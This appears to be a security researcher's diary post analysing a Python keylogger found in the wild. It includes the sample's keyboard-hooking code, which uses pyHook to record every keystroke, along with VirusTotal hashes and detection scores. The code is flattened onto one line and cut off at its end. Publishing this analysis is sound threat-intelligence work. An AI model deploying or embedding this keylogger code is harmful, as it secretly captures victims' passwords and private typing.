Last Updated: 2021-03-18 09:46:21 UTC
by Xavier Mertens (Version: 1)
A keylogger is one of the core features implemented by many malware to exfiltrate interesting data and learn about the victim. Besides the fact that interesting keystrokes can reveal sensitive information (usernames, passwords, IP addresses, hostnames, ...), just by having a look at the text typed on the keyboard, the attacker can profile his target and estimate if it's a juicy one or not.
To follow up on my yesterday diary, Microsoft Windows provides API calls to implement a keylogger via API calls like
GetAsyncKeyState() help to determine if a particular key is pressed. But, can attackers implement a keylogger in other languages?
In 2019, I wrote a diary about a keylogger in PowerShell. Seeing that Python becomes more and more popular in the Windows eco-system, I searched for some samples. I found one that was published as a PoC already six years ago(!) but still used in the wild today. It was again submitted to VT a few weeks ago (SHA256:fe057c31951304a59ff6a59f58e49373c736e75305dcd0c53391d310337ccb41) and has still a very nice score (only 3/59).
The implementation is Python is extremely easy thanks to the pyHook module:
import pyHook, pythoncom data='' def GetKeyPressedAndSendIt(event): global data if event.Ascii==13: keys='<ENTER>' elif event.Ascii==8: keys='<BACK SPACE>' elif event.Ascii==9: keys='<TAB>' else: keys=chr(event.Ascii) data=data+keys hm = pyHook.HookManager() hm.KeyDown = GetKeyPressedAndSendIt hm.HookKeyboard() pythoncom.PumpMessages(
I performed a quick retro hunt on VT to search for the same kind of script and found only 9 occurences:
|ebb80bf4d9768ed7ee9ade739304453ac3474bfdbf06d8a414563aa1bf19592f||PE||3/68||2021-02-21 02:51:42 UTC|
|675757ca9bc6b3be10913e5a4ee43bea371ad8f826c5a25d4c0e38e90bfb1f25||PE||2/70||2021-02-17 04:48:20 UTC|
|79b53c72eeb936161ed8069da5e6ccddd42cc993b90ac67fb5262abc194e8797||Script||1/59||2021-02-15 11:43:15 UTC|
|a518235828977df57f0c3442390729affce92ed4613f8fb3cdda48f06d8712b9||Script||0/59||2021-02-02 02:07:36 UTC|
|cd8e126b6305cd97486877bbe1db8e3dfe2653a63d451484399f12ebff339ed3||Script||12/58||2021-02-08 22:35:34 UTC|
|f3d38383b0bf68204bd755ce80110915858b48c860bc7b76d91ec1c7dcb07058||Script||10/58||2021-01-22 22:22:23 UTC|
|395d51c3fdb2f8281cf0a9d9815f256d5f50d6eddd20d36d9eb33938be921d97||PE||13/70||2021-01-17 06:30:19 UTC|
|9866864b511576fe2421b469d163d8d942c29a7651c5f7f505750c70734b1183||Script||0/56||2021-01-15 14:44:05 UTC|
|365b45370d4db7600195c126d700de6e31d4d4084d14ff8e12a4371d84c89c85||Script||1/60||2020-12-21 00:34:00 UTC|
As you can see, the peak of submitted samples occurred between mid-January and mid-February.
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant